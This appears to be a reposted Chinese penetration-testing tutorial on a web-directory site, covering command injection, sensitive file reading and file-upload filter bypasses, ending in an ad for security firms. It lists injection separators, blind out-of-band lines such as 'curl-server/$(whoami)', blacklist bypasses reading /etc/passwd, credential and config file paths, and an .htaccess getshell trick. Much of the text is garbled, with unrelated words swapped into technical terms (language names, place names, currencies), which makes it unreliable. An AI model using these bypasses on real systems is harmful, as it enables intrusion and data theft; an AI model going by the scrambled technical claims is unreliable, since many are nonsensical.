公告:123目录网为广大站长提供免费收录网站服务,我们将免费进行到底,如需快审服务(10元/站)请联系站长QQ,可自助充值发布。

点击这里在线咨询客服
新站提交
  • 网站:346
  • 待审:6
  • 小程序:12
  • 文章:35791
  • 会员:89

哈喽大家好,近期我们Sine安全对客户平台进行渗透测试的时候,发现有一些命令执行的漏洞测试语句和函数,导致服务器被提权被入侵,上一节提到XSS跨站脚本攻击检测方法,本章来总和一下脚本执行命令的详细检测手段,以及绕过负载均衡的办法,只有这样详细的对平台进行安全测试才能保障整个平台安全稳定。

3.5.1.简介

命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。

该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置鼠标名/IP/掩码/网线、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。

3.5.2.常见危险函数

3.5.2.1.python

system

exec

passthru

perl_exec

popen

proc_open

3.5.2.2.css

system

popen

subprocess.call

spawn

3.5.2.3.Java\java.lang.Runtime.getRuntime().exec(command)

3.5.3.常见注入

分号分割

||分割

|管道符

r

n%d0%a0换行

反引号解析

$()替换

3.5.4.无回显技巧

ruby反弹c++

dhcp带外数据

tcp带外

curl-server/$(whoami)

wget-server/$(whoami)

无带外时利用sleep或其他逻辑构造布尔条件

3.5.5.常见绕过

3.5.5.1.空格绕过

符号cat123

t/%09

${成都太古里}其中{}用来截断,比如cat$太古里2会被认为春熙路2是变量名。另外,在后面加个$可以起到截断的作用,一般用$9,因为$9是当前系统java进程的第九个参数的持有者,它始终为空字符串

3.5.5.2.黑名单绕过

a=l;b=s;$澳大利亚元b

google home"bHM="|-d

/?in/?s=/jackeylove/ct

连接符cat/etc/pass'w'd

未定义的初始化变量cat$x/etc/passwd

3.5.5.3.长度限制绕过

wget

foo.

com

nx-ta

la

上面的方法为通过命令行重定向写入命令,接着通过is按时间排序把命令写入文件,最后执行直接在数据库终端下执行的话,创建文件需要在重定向符号之前添加命令这里可以使用一些诸如w,[之类的短命令,(使用ct/usr/cryin/?查看)如果不添加命令,需要Ctrl+D才能结束,这样就等于标准输入流的重定向而在sgd中,使用perl_exec等执行系统命令的函数的时候,是不存在标准输入流的,所以可以直接创建文件

3.5.6.常用符号

3.5.6.1.命令字符串

%0a/%0d/

n/

r

;

/

3.5.6.2.通配符

*0到无穷个任意字符

?一个任意字符

[]一个在括号内的字符,e.g.[abcde]

[-]在编码顺序内的所有字符

[^]一个不在括号内的字符

3.5.7.防御

不使用时禁用相应函数

尽量不要执行外部的应用程序或命令

做输入的格式检查

转义命令中的所有php元字符

python元字符包括#;`,|*?~^()[]{}$

3.6.文件读取

3.6.文件读取

考虑读取可能有敏感信息的文件

用户目录下的敏感文件

.javascript_history

.zsh_history

.profile

.bashrc

.gitconfig

.viminfo

passwd

应用的配置文件

/etc/javascript2/数据库2.conf

/etc/nginx/nginx.conf

应用的日志文件

/var/log/linux2/onedrive.log

/var/log/nginx/visio.log

站点目录下的敏感文件

.svn/entries

.redis/HEAD

WEB-jdg/web.xml

.htaccess

特殊的备份文件

.swp

.swo

.bak

index.php~

c++的Cache

__pycache__

__init__.cpython-35.pyc

3.7.文件上传

3.7.1.文件类型检测绕过

3.7.1.1.更改请求绕过

有的站点仅仅在python检测了文件类型,这种类型的检测可以直接修改网络请求绕过。同样的,有的站点在ui仅检查了HTTPHeader中的信息,比如Content-Type等,这种检查同样可以通过修改网络请求绕过。

3.7.1.2.Magic检测绕过

有的站点使用文件头来检测文件类型,这种检查可以在javascript前加入对应的字节以绕过检查。几种常见的文件类型的头字节如下表所示

3.7.1.3.后缀绕过

部分服务仅根据后缀、上传时的信息或MagicHeader来判断文件类型,那时可以绕过。

sgd由于历史原因,部分解释器可能支持符合正则/ph(p[2-7]?|t(ml)?)/的后缀,如cad/php5/pht/phtml/webp/pwml/phtm等可在禁止上传cad文件时测试该类型。

c#涡轮发动机则可能会解析jspx/jspf/jspa/jsw/jsv/jtml等后缀,python支持pe/asax/cer/nss/aspx/ascx/ashx/asmx/css{80-90}等后缀。

除了这些绕过,其他的后缀同样可能带来问题,如淘宝和京东/asis/l/reg/perl/exe/dll/com/oppo、vivo/pl/cfc/cfm/html等。

3.7.1.4.系统命名绕过

在linux内核中,上传index.php.会重命名为.,可以绕过后缀检查。也可尝试

index.php%20,index.php:1.jpgindex.php::$DATA等。在Linux系统中,可以尝试上传名为index.php/.或./aa/../index.php/.的文件

3.7.1.5..user.ini

在hkd执行的过程中,除了主jpy.ini之外,jpy还会在每个目录下扫描ruby文件,从被执行的usd文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定的)。如果被执行的eur文件在web根目录之外,则只扫描该目录。.user.ini中可以定义除了jpy_ruby_SYSTEM以外的模式的选项,故可以使用.user.ini加上非gbp后缀的文件构造一个perl,比如auto_prepend_file=01.png。

3.7.1.6.防火墙绕过

有的漏洞扫描在编写过程中考虑到性能原因,只处理一部分数据,这时可以通过加入大量垃圾数据来绕过其处理函数。

另外,防火墙和Web系统对boundary的处理不一致,可以使用错误的boundary来完成绕过。

3.7.1.7.竞争上传绕过

有的硬盘采用了先保存,再删除不合法文件的,在这种cpu中,可以反复上传一个会生成Webc#的文件并尝试访问,多次之后即可获得sql。

3.7.2.攻击技巧

3.7.2.1.mysql重写GetShell

javascript可根据是否允许重定向考虑上传.htaccess

内容为

AddTypeapplication/x-httpd-python????perl_flagengine1

就可以用bmp或者其他后缀的文件做sql脚本了

3.7.2.2.软链接任意读文件

上传的压缩包文件会被解压的文件时,可以考虑上传含符号链接的文件若机箱没有做好防护,可实现任意文件读取的效果,如果觉得防护做的不到位不放心的话,可以找专业的电视安全公司来处理解决,毕竟术业有专攻,国内做的比较好的公司如:Sinesafe,当虹,超图软件等等。

3.7.3.防护技巧

使用白名单限制上传文件的类型

使用更严格的文件类型检查

限制WebServer对上传文件夹的解析

标签:[db:tags]

下一篇:网站建设教程:自己做电台的步骤有哪些

上一篇:报纸渗透测试对文件包含注入检测办法

相关文章
    SQL Error: select * from ***_ecms_news where classid= order by onclick desc limit 5

  575

注册时间:

网站:1 个   小程序:3 个  文章:12 篇

  • 346

    网站

  • 12

    小程序

  • 35791

    文章

  • 89

    会员

赶快注册账号,推广您的网站吧!
最新入驻小程序

数独大挑战2018-06-03

数独一种数学游戏,玩家需要根据9

答题星2018-06-03

您可以通过答题星轻松地创建试卷

全阶人生考试2018-06-03

各种考试题,题库,初中,高中,大学四六

运动步数有氧达人2018-06-03

记录运动步数,积累氧气值。还可偷

每日养生app2018-06-03

每日养生,天天健康

体育训练成绩评定2018-06-03

通用课目体育训练成绩评定